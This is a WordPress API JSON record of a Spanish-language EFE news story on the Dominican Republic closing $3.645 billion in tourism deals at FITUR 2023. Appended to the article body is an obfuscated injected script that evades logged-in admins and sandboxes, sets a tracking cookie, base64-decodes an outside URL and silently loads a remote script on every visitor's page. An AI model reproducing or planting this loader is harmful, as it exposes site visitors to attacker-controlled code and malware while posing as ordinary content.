{"id":13509,"date":"2023-01-20T14:25:57","date_gmt":"2023-01-20T18:25:57","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13509"},"modified":"2023-01-20T14:25:57","modified_gmt":"2023-01-20T18:25:57","slug":"republica-dominicana-cierra-en-fitur-operaciones-por-3-645-millones-dolares","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13509","title":{"rendered":"Rep\u00fablica Dominicana cierra en FITUR operaciones por 3.645 millones d\u00f3lares"},"content":{"rendered":"<p>Madrid, 20 (EFE).- Rep\u00fablica Dominicana cerr\u00f3 esta edici\u00f3n de la Feria Internacional del Turismo de Madrid (<strong>FITUR<\/strong>) con acuerdos por operaciones por un valor de 3.645 millones de d\u00f3lares, de los cuales 1.645 millones ser\u00e1n ya invertidos en 2023, seg\u00fan anunci\u00f3 a EFE el ministro dominicano,\u00a0David Collado.<\/p>\n<p>En una entrevista en el stand del pa\u00eds en\u00a0FITUR, que comenz\u00f3 el pasado mi\u00e9rcoles y finaliza este domingo, el ministro de Turismo tild\u00f3 de \u00ab\u00e9xito\u00bb para Dominicana esta edici\u00f3n de una de las ferias de turismo m\u00e1s importantes del mundo.<\/p>\n<div id=\"\" class=\"mmc_ads \">\n<div id=\"div-gpt-ad-4266511088524-mmc\" class=\"\" data-google-query-id=\"CLX60Mvh1vwCFZM8hwod-8AMzA\">\n<div id=\"google_ads_iframe_\/22084339\/elCaribe_EyM_MediumBanner_InContent_1_0__container__\">Collado explic\u00f3 que, durante esta semana, su ministerio pudo \u00abdesarrollar acuerdos con agencias de viaje\u00bb que actualmente \u00abgarantizan la llegada a Rep\u00fablica Dominicana de unos 711.000 extranjeros, promediando los \u00faltimos dos a\u00f1os\u00bb, y adelant\u00f3 que el nuevo objetivo es llegar a los 800.000.<\/div>\n<\/div>\n<\/div>\n<p>\u00abEl mercado europeo es extremadamente importante para nosotros, a\u00fan con el tema de Rusia y Ucrania llegan anualmente llegan 1.300.000 visitantes de Europa, siendo Espa\u00f1a, Francia, Inglaterra, Alemania e Italia los principales\u00bb lugares de origen.<\/p>\n<p>\u00abEstamos muy contentos con los resultados que hemos obtenido\u00bb, comparti\u00f3 el dominicano, quien apunt\u00f3 tambi\u00e9n que el pa\u00eds firm\u00f3 sendos acuerdos con las aerol\u00edneas espa\u00f1olas Iberia y Air Europa, adem\u00e1s de con la alemana Tuis.<\/p>\n<p>\u00abCon Iberia tenemos un acuerdo de colaboraci\u00f3n de muchos a\u00f1os, este a\u00f1o firmamos un acuerdo donde se garantiza seguir con la ocupaci\u00f3n de Iberia que es extremadamente alta, de un 80 por ciento\u00bb, explic\u00f3<\/p>\n<p>A su vez, Collado celebr\u00f3 que Air Europa haya \u00abgarantizado aumentar frecuencias\u00bb en sus vuelos a la isla caribe\u00f1a as\u00ed como establecer \u00abun vuelo entre Nueva York y Santo Domingo\u00bb: \u00abPara nosotros son grandes noticias porque vive una di\u00e1spora grande de dominicanos, un mill\u00f3n aproximadamente\u00bb.<\/p>\n<h3 id=\"h-reconquistar-espana-y-europa\">\u00abRECONQUISTAR\u00bb ESPA\u00d1A Y EUROPA<\/h3>\n<p>El ministro ironiz\u00f3 sobre la apretada agenda que mantuvo estos d\u00edas con empresas operadoras tur\u00edsticas espa\u00f1olas y nacionales y asegur\u00f3 que su comitiva vino a \u00abreconquistar\u00bb Espa\u00f1a, en alusi\u00f3n a la conquista espa\u00f1ola de Am\u00e9rica.<\/p>\n<p>\u00abNosotros vinimos a reconquistarlos\u00bb, dijo entre risas al tiempo que se refiri\u00f3 al \u00abencuentro con 350 empresas\u00bb donde presentaron \u00abel pa\u00eds, los n\u00fameros y los nichos de mercado\u00bb.<\/p>\n<p>A su vez, les mostr\u00f3 c\u00f3mo trabaja \u00abel centro de inteligencia\u00bb de su Ministerio, que \u00abvisualiza cu\u00e1ntos turistas europeos llegan diariamente, de qu\u00e9 edades, si viajan en pareja, en familia, si van a hacer turismo de aventura\u2026\u00bb.<\/p>\n<p>Uno de los resultados de estos estudios, seg\u00fan cont\u00f3 a EFE, es el atractivo que tiene su pa\u00eds para \u00abla generaci\u00f3n Z espa\u00f1ola\u00bb (los j\u00f3venes nacidos entre los 90 y los 2000).<\/p>\n<p>\u00abLos n\u00fameros est\u00e1n disparados, sobre todo en el caso de Espa\u00f1a, que env\u00eda 200.000 residentes y nuestra idea es llegar a los 250.000 o 300.000\u00bb, declar\u00f3.<\/p>\n<h3>EL MERCADO EUROPEO \u00abDESCUIDADO\u00bb EN EL PASADO<\/h3>\n<p>Collado lament\u00f3 que su pa\u00eds haya \u00abdescuidado\u00bb al mercado europeo durante el pasado, pero asegur\u00f3 que \u00abdesde 2022\u00bb se est\u00e1n \u00abhaciendo todos los esfuerzos\u00bb para mejorar la conectividad con el continente.<\/p>\n<p>\u00abNos unen a\u00f1os de historia y de relaciones comerciales, los primeros hoteles que se abrieron fueron los espa\u00f1oles\u00bb, rememor\u00f3.<\/p>\n<p>Pese a ello, el titular dominicano record\u00f3 que el turismo del pa\u00eds \u00abacaba de salir de un a\u00f1o r\u00e9cord\u00bb con \u00abunos ocho millones de turistas\u00bb.\u00abMas de 7.100.000 que entraron v\u00eda \u00e1rea y 1.300.000 que entraron v\u00eda crucero, mientras la Organizaci\u00f3n Mundial del Turismo emiti\u00f3 un bolet\u00edn del 2022 diciendo que el turismo en el mundo baj\u00f3 un 30%, en Rep\u00fablica Dominicana subi\u00f3 un 10 por ciento\u00bb, asever\u00f3.<\/p>\n<p>Una industria que la isla pretende seguir cuidando y aumentando, ya que supone \u00abel 15% del Producto Interior Bruto\u00bb, da trabajo \u00abde manera directa o indirecta a 899.000 empleados\u00bb y deja en las arcas p\u00fablicas \u00ab8.500 millones de d\u00f3lares\u00bb anuales.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Madrid, 20 (EFE).- Rep\u00fablica Dominicana cerr\u00f3 esta edici\u00f3n de la Feria Internacional del Turismo de Madrid (FITUR) con acuerdos por operaciones por un valor de 3.645 millones de d\u00f3lares, de los cuales 1.645 millones ser\u00e1n ya invertidos en 2023, seg\u00fan anunci\u00f3 a EFE el ministro dominicano,\u00a0David Collado. En una entrevista en el stand del pa\u00eds [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13511,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13509","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13509","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13509"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13509\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13511"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13509"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13509"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13509"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}